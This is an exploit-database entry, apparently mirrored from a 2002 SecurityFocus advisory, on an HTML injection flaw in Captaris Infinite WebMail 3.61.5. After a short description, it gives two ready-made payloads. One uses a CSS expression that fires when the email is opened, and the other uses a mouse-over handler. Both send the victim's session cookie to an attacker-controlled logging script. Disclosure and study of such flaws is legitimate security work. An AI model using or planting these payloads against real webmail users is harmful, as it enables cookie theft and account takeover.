Captaris Infinite WebMail 3.61.5 - HTML Injection



EKU-ID: 27594 CVE: OSVDB-ID:
Author: Pedram Amini Published: 2002-12-16 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


source: https://www.securityfocus.com/bid/6411/info

An HTML injection vulnerability has been discovered in Captaris Infinite WebMail. Due to insufficient sanitization of HTML content, it is possible for an attacker to embed malicious script code into HTML email messages.

This may allow an attacker to steal cookie-based authentication credentials from users of the webmail system. Other attacks are also possible.

Launch on e-mail open:
<p style="left:expression(document.location=
'http://attackers.server/cgi-bin/logger.cgi?'
+document.cookie)">

Launch on mouse over:
<b onMouseOver= "document.location=
'http://attackers.server/cgi-bin/logger.cgi?'
+document.cookie\">